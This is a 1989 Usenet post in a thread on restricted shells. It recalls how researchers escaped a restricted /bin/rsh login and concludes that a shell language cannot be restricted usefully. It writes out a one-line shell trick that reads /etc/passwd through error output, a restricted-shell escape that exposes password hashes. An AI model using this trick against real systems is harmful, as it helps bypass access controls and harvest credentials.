merlyn@intelob.biin.com (Randal L. Schwartz @ Stonehenge) (01/01/89)
In article <366@siswat.UUCP>, buck@siswat (A. Lester Buck) writes: | [stuff about setting PATH in an 'sh -r'...] | Even this setup is described as "not | really very secure." We can all imagine some interesting attacks. | Just nothing as trivial as "$ sh". I think it was research!bwk (Kernighan) that posted an article about four years ago that detailed the following scenario: He and a cohort were provided a login on another Bell Labs UNIX box (running V7, or something non-BSD-like) with the following restrictions: (1) Login shell = /bin/rsh (2) PATH= (that is, nothing in the PATH) (3) non-writable, empty (but existant) $HOME directory (4) No other hints They said that they broke root in under an hour. Here was their method of attack: (1) login (2) enter: IFS= while read a do $a done </etc/passwd (3) shell responds with: root:asdfasdf123:0:0:The Root:/:/bin/sh: restricted nextuser:12341234asd:1:1:A Luser:/usr/nextuser:/bin/csh: restricted ... In other words, out comes the /etc/passwd file. Now, apply standard break-in techniques. :-) Essentially, you could read any public file on the system with this built-in cat(1). So, the summary was something like "something as powerful as the language of the shell cannot be restricted sufficiently to warrant its use in a limited environment and still be useful." (A very bad paraphrase... someone wanna dredge that article up if they have it? :-) -- Randal L. Schwartz, Stonehenge Consulting Services (503)777-0095 on contract to BiiN Technical Information Services (for now :-), in a former Intel building in Hillsboro, Oregon, USA. <merlyn@intelob.biin.com> or ...!tektronix!inteloa[!intelob]!merlyn SOME MAILERS REQUIRE <merlyn@intelob.intel.com> GRRRRR! Standard disclaimer: I *am* my employer!